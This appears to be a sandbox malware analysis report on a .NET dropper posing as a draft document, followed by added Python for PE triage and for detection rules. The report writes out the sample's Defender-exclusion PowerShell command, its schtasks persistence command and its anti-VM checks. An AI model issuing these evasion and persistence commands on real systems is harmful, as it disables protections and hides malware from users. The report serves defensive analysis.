Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6416:120:WilError_01
Source: 8.0.CO DRAFT Al Zaytounah project.exe.400000.12.unpack, A/b2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 8.0.CO DRAFT Al Zaytounah project.exe.400000.8.unpack, A/b2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: 8.0.CO DRAFT Al Zaytounah project.exe.400000.4.unpack, A/b2.cs | Cryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | File read: C:\Windows\System32\drivers\etc\hosts (2 times)
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: CO DRAFT Al Zaytounah project.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: CO DRAFT Al Zaytounah project.exe | Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: CO DRAFT Al Zaytounah project.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                      Data Obfuscation:

.NET source code contains potential unpacker
Source: CO DRAFT Al Zaytounah project.exe, GameSettingsWindow.cs | .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: eyjBzJU.exe.0.dr, GameSettingsWindow.cs | .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.CO DRAFT Al Zaytounah project.exe.ec0000.0.unpack, GameSettingsWindow.cs | .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.CO DRAFT Al Zaytounah project.exe.ec0000.0.unpack, GameSettingsWindow.cs | .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.CO DRAFT Al Zaytounah project.exe.700000.13.unpack, GameSettingsWindow.cs | .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.CO DRAFT Al Zaytounah project.exe.700000.2.unpack, GameSettingsWindow.cs | .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.CO DRAFT Al Zaytounah project.exe.700000.11.unpack, GameSettingsWindow.cs | .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.CO DRAFT Al Zaytounah project.exe.700000.1.unpack, GameSettingsWindow.cs | .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 8.0.CO DRAFT Al Zaytounah project.exe.700000.3.unpack, GameSettingsWindow.cs | .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Code function: 0_2_0186E318 push esp; iretd
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Code function: 0_2_0186D644 pushad ; ret
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Code function: 8_3_00EFB7F1 push eax; retf
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Code function: 8_3_00EFBAB6 pushfd ; retf
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Code function: 8_3_00EFBA69 pushfd ; retf
Source: CO DRAFT Al Zaytounah project.exe | Static PE information: 0xB8CA9CB1 [Thu Mar 29 22:35:29 2068 UTC]
Source: initial sample | Static PE information: section name: .text entropy: 7.82200037315
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | File created: C:\Users\user\AppData\Roaming\eyjBzJU.exe
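Two of the static findings in this section, the COFF timestamp 0xB8CA9CB1 (a build time in 2068) and a .text section with entropy 7.82, can be reproduced with a few dozen lines of header parsing, which is useful for triaging a batch of samples before spending sandbox time. The following is an added example, not Joe Sandbox code: it walks the MZ and PE headers, decodes the timestamp, computes per-section Shannon entropy and flags the same two conditions. The PE image it runs on is constructed inline (i386 machine type, one .text section filled with a uniform byte distribution that stands in for encrypted code); pass the bytes of a real file to parse_pe() or triage() to use it on the sample.

```python
"""PE header triage for two facts this report raises: a COFF TimeDateStamp
far in the future (0xB8CA9CB1 -> 2068) and a .text section with entropy near
8 bits/byte (7.82 in the sample, typical of packed or encrypted code).
Added example, not Joe Sandbox code. The PE image below is constructed
inline so the script runs offline; pass real file bytes to triage()."""
import math
import struct
from datetime import datetime, timezone
from typing import Optional


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for a constant buffer, 8.0 for uniform."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_pe(blob: bytes) -> dict:
    """Walk MZ -> e_lfanew -> PE\\0\\0 -> IMAGE_FILE_HEADER -> section table."""
    if blob[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    # IMAGE_FILE_HEADER (20 bytes): Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    machine, nsec, tstamp, _, _, opt_size, _ = struct.unpack_from(
        "<HHIIIHH", blob, e_lfanew + 4)
    sec_table = e_lfanew + 4 + 20 + opt_size
    sections = []
    for i in range(nsec):
        off = sec_table + i * 40              # IMAGE_SECTION_HEADER is 40 bytes
        name = blob[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", blob, off + 16)
        sections.append((name, shannon_entropy(blob[raw_ptr:raw_ptr + raw_size])))
    return {"machine": machine, "timestamp": tstamp, "sections": sections}


def triage(blob: bytes, now: Optional[datetime] = None) -> list:
    """Findings a sandbox raises from the header alone, as strings."""
    now = now or datetime.now(timezone.utc)
    info = parse_pe(blob)
    findings = []
    ts = datetime.fromtimestamp(info["timestamp"], tz=timezone.utc)
    if ts > now:
        findings.append(f"timestamp in the future: {ts:%Y-%m-%d %H:%M:%S} UTC")
    for name, ent in info["sections"]:
        if ent > 7.0:                         # compiled code sits well below 7
            findings.append(f"section {name} entropy {ent:.2f} (likely packed)")
    return findings


def build_sample_pe(timestamp: int, text: bytes) -> bytes:
    """Constructed PE32 image: DOS header, COFF header with the given
    timestamp, zero-filled optional header, one .text section holding text."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt_size = 224                            # PE32 optional header size
    coff = struct.pack("<HHIIIHH", 0x14C, 1, timestamp, 0, 0, opt_size, 0x0102)
    opt = struct.pack("<H", 0x10B) + b"\0" * (opt_size - 2)
    raw_ptr = e_lfanew + 4 + 20 + opt_size + 40
    # VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData
    sec = b".text".ljust(8, b"\0") + struct.pack("<IIII", len(text), 0x1000, len(text), raw_ptr)
    sec = sec.ljust(40, b"\0")
    return dos + b"PE\0\0" + coff + opt + sec + text


# The report's timestamp and a uniformly distributed .text body standing in
# for encrypted code (entropy exactly 8.0; the real sample measured 7.82).
SAMPLE_PE = build_sample_pe(0xB8CA9CB1, bytes(range(256)) * 16)

if __name__ == "__main__":
    for finding in triage(SAMPLE_PE):
        print(finding)
```

One caveat on the timestamp: on a .NET assembly it is not proof of tampering by itself, because a compiler running with deterministic builds stores a hash of the build inputs in that field instead of a date, so the value can land anywhere. Read it together with the entropy of the section holding the code. A managed .text above 7 bits/byte is exactly what the "very large array initializations" and Assembly.Load(byte[]) findings above predict: the real payload sits in the binary encrypted and is decrypted and loaded at run time.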

                      Boot Survival:

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eyjBzJU" /XML "C:\Users\user\AppData\Local\Temp\tmp79A6.tmp
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match | File source: 0.2.CO DRAFT Al Zaytounah project.exe.3291bc8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.681220083.0000000003271000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.681428409.0000000003370000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: CO DRAFT Al Zaytounah project.exe PID: 6960, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: CO DRAFT Al Zaytounah project.exe, 00000000.00000002.681428409.0000000003370000.00000004.00000001.sdmp, CO DRAFT Al Zaytounah project.exe, 00000000.00000002.681220083.0000000003271000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
Source: CO DRAFT Al Zaytounah project.exe, 00000000.00000002.681428409.0000000003370000.00000004.00000001.sdmp, CO DRAFT Al Zaytounah project.exe, 00000000.00000002.681220083.0000000003271000.00000004.00000001.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe TID: 6964 | Thread sleep time: -33676s >= -30000s
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe TID: 7016 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6472 | Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe TID: 5500 | Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe TID: 5652 | Thread sleep count: 1026 > 30
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe TID: 5652 | Thread sleep count: 8825 > 30
Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6302
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2131
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Window / User API: threadDelayed 1026
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Window / User API: threadDelayed 8825
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Thread delayed: delay time: 33676
Source: CO DRAFT Al Zaytounah project.exe, 00000000.00000002.681220083.0000000003271000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: CO DRAFT Al Zaytounah project.exe, 00000008.00000002.930054155.0000000000E97000.00000004.00000020.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllu
Source: CO DRAFT Al Zaytounah project.exe, 00000000.00000002.681220083.0000000003271000.00000004.00000001.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: CO DRAFT Al Zaytounah project.exe, 00000000.00000002.681220083.0000000003271000.00000004.00000001.sdmp | Binary or memory string: vmware
Source: CO DRAFT Al Zaytounah project.exe, 00000000.00000002.681220083.0000000003271000.00000004.00000001.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeProcess token adjusted: Debug
                      Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exeMemory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion:

Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eyjBzJU.exe (x3)
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eyjBzJU" /XML "C:\Users\user\AppData\Local\Temp\tmp79A6.tmp
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Process created: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe
Source: CO DRAFT Al Zaytounah project.exe, 00000008.00000002.930480737.0000000001470000.00000002.00020000.sdmp | Binary or memory string: Program Manager
Source: CO DRAFT Al Zaytounah project.exe, 00000008.00000002.930480737.0000000001470000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
Source: CO DRAFT Al Zaytounah project.exe, 00000008.00000002.930480737.0000000001470000.00000002.00020000.sdmp | Binary or memory string: Progman
Source: CO DRAFT Al Zaytounah project.exe, 00000008.00000002.930480737.0000000001470000.00000002.00020000.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Queries volume information: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe VolumeInformation
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (x3)
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (x3)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (x3)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation (x3)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (x2)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (x2)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Queries volume information: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe VolumeInformation
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation (x3)
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
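The three "Process created" entries in this section (PowerShell adding a Defender exclusion for a file under the user's AppData\Roaming, schtasks importing a task definition from AppData\Local\Temp, and the sample launching a second copy of its own image) are the behaviours a detection engineer would want to turn into rules. The following Python is an added example and is not part of the Joe Sandbox report nor code from the sample: it implements those three checks over Sysmon-style process-creation events. The events are constructed to mirror the command lines above plus two benign look-alikes; the field names (parent, image, cmdline), rule names and severities are the example's own choices.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

Event = Dict[str, str]  # keys: parent (image path), image (child path), cmdline


@dataclass
class Finding:
    rule: str
    severity: str
    cmdline: str


# Locations a standard user can write to: an exclusion covering one of these
# shields attacker-controlled files, which an admin-deployed exclusion rarely does.
USER_WRITABLE = re.compile(
    r"\\Users\\[^\\]+\\AppData\\|\\Users\\Public\\|\\ProgramData\\|\\Windows\\Temp\\",
    re.IGNORECASE)
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\|\\Windows\\Temp\\", re.IGNORECASE)
USER_PROFILE = re.compile(r"\\Users\\[^\\]+\\", re.IGNORECASE)


def arg_after(switch: str, cmdline: str) -> Optional[str]:
    """Return the (optionally double-quoted) argument following a switch, or None."""
    m = re.search(re.escape(switch) + r'\s+(?:"([^"]*)"|(\S+))', cmdline, re.IGNORECASE)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)


def rule_defender_exclusion(ev: Event) -> Optional[Finding]:
    """PowerShell changing Defender exclusions; high if the target is user-writable."""
    if not ev["image"].lower().endswith(("powershell.exe", "pwsh.exe")):
        return None
    cmd = ev["cmdline"]
    if not re.search(r"\bAdd-MpPreference\b", cmd, re.IGNORECASE):
        return None
    for switch in ("-ExclusionPath", "-ExclusionProcess"):
        target = arg_after(switch, cmd)
        if target and USER_WRITABLE.search(target):
            return Finding("defender_exclusion_user_writable_path", "high", cmd)
    # Any other exclusion change still deserves a ticket, just a lower-priority one.
    return Finding("defender_exclusion_added", "medium", cmd)


def rule_schtasks_xml_from_temp(ev: Event) -> Optional[Finding]:
    """schtasks /Create importing its task XML from a temp directory."""
    if not ev["image"].lower().endswith("schtasks.exe"):
        return None
    cmd = ev["cmdline"]
    if not re.search(r"/create\b", cmd, re.IGNORECASE):
        return None
    xml = arg_after("/XML", cmd)
    if xml and TEMP_DIR.search(xml):
        return Finding("schtasks_create_xml_from_temp", "high", cmd)
    return None


def rule_self_spawn_from_user_profile(ev: Event) -> Optional[Finding]:
    """A binary in a user profile starting a fresh copy of itself (loader/hollowing pattern)."""
    if ev["parent"].lower() != ev["image"].lower():
        return None
    if not USER_PROFILE.search(ev["image"]):
        return None
    return Finding("self_spawn_from_user_profile", "medium", ev["cmdline"])


RULES = [rule_defender_exclusion, rule_schtasks_xml_from_temp, rule_self_spawn_from_user_profile]


def scan(events: List[Event]) -> List[Finding]:
    """Apply every rule to every event and collect the findings."""
    findings: List[Finding] = []
    for ev in events:
        for rule in RULES:
            f = rule(ev)
            if f is not None:
                findings.append(f)
    return findings


# Constructed sample events (not real telemetry): the three report entries plus two benign cases.
SAMPLE = r"C:\Users\user\Desktop\CO DRAFT Al Zaytounah project.exe"
PS = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
SCHTASKS = r"C:\Windows\SysWOW64\schtasks.exe"
SAMPLE_EVENTS: List[Event] = [
    {"parent": SAMPLE, "image": PS,
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eyjBzJU.exe"'},
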